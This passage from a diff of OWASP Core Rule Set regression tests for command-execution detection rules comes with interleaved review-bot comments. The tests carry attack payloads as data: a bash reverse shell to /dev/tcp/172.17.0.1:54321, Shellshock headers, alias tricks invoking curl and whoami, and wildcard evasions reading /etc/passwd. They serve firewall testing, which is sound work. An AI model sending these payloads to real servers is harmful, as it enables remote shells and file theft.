method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" + - test_id: 12 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: &/dev/tcp/172.17.0.1/54321 0>&1\'`; ?> - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: &/dev/tcp/172.17.0.1/54321 0>&1\'`; ?> + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: "id \"932161\"" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml index 7abbc9c97..6e8179bd9 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml 
@@ -2,24 +2,22 @@ meta: author: "Franziska Bühler, azurit" description: "Remote Command Execution: Shellshock (CVE-2014-6271)" - enabled: true - name: 932170.yaml +rule_id: 932170 tests: - - test_title: 932170-1 + - test_id: 1 desc: "Test for '() {' in request header test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Test: () { - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932170" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Test: () { + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "932170" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml index 71572eddb..9fefdbbb8 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml 
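Review bot: `Test: () {` is left as an unquoted plain scalar whose characters look like flow indicators; it does parse in block context, but this value is the payload the whole test exists for, so quoting it as `Test: '() {'` makes the intent explicit and removes any dependence on the parser's plain-scalar rules. The surrounding header values in this test are already quoted, so the quoted form is also the consistent one.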
@@ -2,40 +2,37 @@ meta: author: "Franziska Bühler, azurit" description: "Remote Command Execution: Shellshock (CVE-2014-6271)" - enabled: true - name: 932171.yaml +rule_id: 932171 tests: - - test_title: 932171-1 + - test_id: 1 desc: "Test for '() {' in ARGS_NAMES" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?%28%29%20%7B" - version: HTTP/1.0 - output: - log_contains: id "932171" - - test_title: 932171-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?%28%29%20%7B" + version: HTTP/1.0 + output: + log_contains: id "932171" + - test_id: 2 desc: "Test for '() {' in ARGS" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=%28%29%20%7B" - version: HTTP/1.0 - output: - log_contains: id "932171" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=%28%29%20%7B" + version: HTTP/1.0 + output: + log_contains: id "932171" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml index 790b5740a..b8e7354c2 100644 
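Review bot: The two percent-encoded URIs (`/get?%28%29%20%7B` and `/get?arg=%28%29%20%7B`) are not annotated with their decoded form, whereas 932160 tests 9 and 10 in this same change carry a `# code=...` comment above the `uri` line; a reader has to decode by hand to confirm that test 1 really puts `() {` in a parameter name and test 2 in a parameter value. Add `# decoded: /get?() {` above test 1's `uri` and `# decoded: /get?arg=() {` above test 2's, matching the 932160 convention.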
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml
@@ -2,272 +2,256 @@ meta: author: "Felipe Zipitria, azurit" description: "Remote Command Execution: shell aliasing detection" - enabled: true - name: 932175.yaml +rule_id: 932175 tests: - - test_title: 932175-1 + - test_id: 1 desc: "Test for 0FA9HCGT alias eennvv=env&eennvv whoami" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=alias%20eennvv%3Denv%26eennvv%20whoami" - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=alias%20eennvv%3Denv%26eennvv%20whoami" + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 2 desc: "Test for alias with shell tricks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias a=c${KK}url&a google.com - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias a=c${KK}url&a google.com + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 3 desc: "Test for alias name with single quoting" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias 'letter'=curl&letter google.com - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias 'letter'=curl&letter google.com + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 4 desc: "Test for alias name with double quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias "quote"=curl"e google.com - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias "quote"=curl"e google.com + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 5 desc: "Test for alias value with single quoting" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias alias='curl'&letter google.com - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-6 + - input: + 
dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias alias='curl'&letter google.com + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 6 desc: "Test for alias value with double quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias double="curl""e google.com - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias double="curl""e google.com + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 7 desc: "Negative test alias" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - "text=I%20see%2C%20so%20your%20alias%20is%20not%20%3D%20to%20your%20name" - version: HTTP/1.1 - output: - no_log_contains: id "932175" - - test_title: 932175-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + "text=I%20see%2C%20so%20your%20alias%20is%20not%20%3D%20to%20your%20name" + 
version: HTTP/1.1 + output: + no_log_contains: id "932175" + - test_id: 8 desc: "Negative test alias with quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - "text=The%20pizza%20vendor%20was%20known%20by%20the%20alias%20%22pineapple%22%20online." - version: HTTP/1.1 - output: - no_log_contains: id "932175" - - test_title: 932175-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + "text=The%20pizza%20vendor%20was%20known%20by%20the%20alias%20%22pineapple%22%20online." + version: HTTP/1.1 + output: + no_log_contains: id "932175" + - test_id: 9 desc: "Status Page Test - Test for simple alias example" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=alias%20a=b" - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=alias%20a=b" + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 10 desc: "Test for alias with -p argument" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - 
User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias -p jzfrx=id - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias -p jzfrx=id + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 11 desc: "Test for alias with zsh flags" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias -gmr a=b - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias -gmr a=b + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 12 desc: | Test for alias with zsh '+' flags. 
Payload: "alias +m a=b" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=%61%6c%69%61%73%20%2b%6d%20%61%3d%62" - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=%61%6c%69%61%73%20%2b%6d%20%61%3d%62" + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 13 desc: | Test for alias with trailing '+' in a flag. Payload: "alias +g+ a=b" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=%61%6c%69%61%73%20%2b%67%2b%20%61%3d%62" - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=%61%6c%69%61%73%20%2b%67%2b%20%61%3d%62" + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 14 desc: "Test for alias with zsh flags" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias ls-al='ls -al' - version: HTTP/1.1 - output: - 
log_contains: id "932175" - - test_title: 932175-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias ls-al='ls -al' + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 15 desc: "Test for alias with zsh flags" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias ..='cd ..' - version: HTTP/1.1 - output: - log_contains: id "932175" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias ..='cd ..' + version: HTTP/1.1 + output: + log_contains: id "932175" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml index 5784dde62..856f3ea8d 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml 
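Review bot: Tests 14 and 15 reuse the description `Test for alias with zsh flags` from test 11, although their payloads (`alias ls-al='ls -al'` and `alias ..='cd ..'`) exercise an alias name containing a hyphen and one consisting only of dots, not zsh flags; the `desc` lines should say what is actually covered, e.g. `desc: "Test for alias name containing a hyphen"` and `desc: "Test for alias name consisting of dots"`. Separately, the `data: |` blocks of the negative tests 7 and 8 keep the surrounding double quotes as part of the block scalar, so the POST body sent starts with `"text=` rather than `text=`; if that is not deliberate, drop the quotes inside the block so the negative case matches a realistic form body.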
@@ -2,82 +2,78 @@ meta: author: "Franziska Bühler, azurit" description: "Restricted File Upload Attempt" - enabled: true - name: 932180.yaml +rule_id: 932180 tests: - - test_title: 932180-1 + - test_id: 1 desc: "Test file upload with request header X-Filename and filename settings.php" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - X-Filename: settings.php - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932180" - - test_title: 932180-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + X-Filename: settings.php + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "932180" + - test_id: 2 desc: "Test file upload with multipart/form-data and filename config.yml" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - Content-Disposition: form-data; name="config"; filename="config.yml" - Content-Type: text/yaml + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; 
boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ + Content-Disposition: form-data; name="config"; filename="config.yml" + Content-Type: text/yaml - ... Some content ... - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - Content-Disposition: form-data; name="image"; filename="test.png" - Content-Type: image/png + ... Some content ... + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ + Content-Disposition: form-data; name="image"; filename="test.png" + Content-Type: image/png - BINARYDATA - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- - output: - log_contains: id "932180" - - test_title: 932180-3 + BINARYDATA + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- + output: + log_contains: id "932180" + - test_id: 3 desc: "File upload - negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - Content-Disposition: form-data; name="image"; filename="test.jpg" - Content-Type: image/jpeg + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ + Content-Disposition: form-data; name="image"; filename="test.jpg" + Content-Type: image/jpeg - ... Some content ... 
- ------WebKitFormBoundaryABCDEFGIJKLMNOPQ + ... Some content ... + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - BINARYDATA - --0000-- - output: - no_log_contains: id "932180" + BINARYDATA + --0000-- + output: + no_log_contains: id "932180" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml index bb7f0da09..0ad487b6d 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml 
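Review bot: The negative test (test_id 3) terminates its multipart body with `--0000--`, which does not match the declared boundary `----WebKitFormBoundaryABCDEFGIJKLMNOPQ`; a malformed multipart body may be rejected by the engine's multipart parser before any filename is inspected, so `no_log_contains: id "932180"` can pass without the rule ever being evaluated. Use the matching terminator `------WebKitFormBoundaryABCDEFGIJKLMNOPQ--`, as test_id 2 does, so the test demonstrates that `filename="test.jpg"` is permitted rather than that the body was unparseable.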
@@ -2,112 +2,105 @@ meta: author: "Franziska Bühler, Max Leske, azurit" description: "Remote Command Execution: Wildcard bypass technique attempt" - enabled: true - name: 932190.yaml +rule_id: 932190 tests: - - test_title: 932190-1 + - test_id: 1 desc: "Match wild card evasion in 'cat+/et*/*wd'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?id=cat%2B%2Fet*%2F*wd" - version: HTTP/1.0 - output: - log_contains: id "932190" - - test_title: 932190-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?id=cat%2B%2Fet*%2F*wd" + version: HTTP/1.0 + output: + log_contains: id "932190" + - test_id: 2 desc: "Match wild card evasion in 'cat+/ET*/*WD'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?id=cat%2B%2FET*%2F*WD" - version: HTTP/1.0 - output: - log_contains: id "932190" - - test_title: 932190-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?id=cat%2B%2FET*%2F*WD" + version: HTTP/1.0 + output: + log_contains: id "932190" + - test_id: 3 desc: "Match wild card evasion in '/???/?s'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - 
headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?id=%2F%3F%3F%3F%2F%3Fs" - version: HTTP/1.0 - output: - log_contains: id "932190" - - test_title: 932190-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?id=%2F%3F%3F%3F%2F%3Fs" + version: HTTP/1.0 + output: + log_contains: id "932190" + - test_id: 4 desc: "No FP in 'Does the * shine bright?'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?id=Does%20the%20%2A%20shine%20bright%3F" - version: HTTP/1.0 - output: - no_log_contains: id "932190" - - test_title: 932190-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?id=Does%20the%20%2A%20shine%20bright%3F" + version: HTTP/1.0 + output: + no_log_contains: id "932190" + - test_id: 5 desc: "Handle single quote evasion mixed with wild card evasion" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: GET - port: 80 - uri: "/get" - version: 
HTTP/1.0 - data: "{\"foo\" : \";+cat+/e't'*/pa'?s'wd\"}" - output: - log_contains: id "932190" - - test_title: 932190-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + data: "{\"foo\" : \";+cat+/e't'*/pa'?s'wd\"}" + output: + log_contains: id "932190" + - test_id: 6 desc: "Handle backslash evasion mixed with wild card evasion" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}" - output: - log_contains: id "932190" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}" + output: + log_contains: id "932190" diff --git 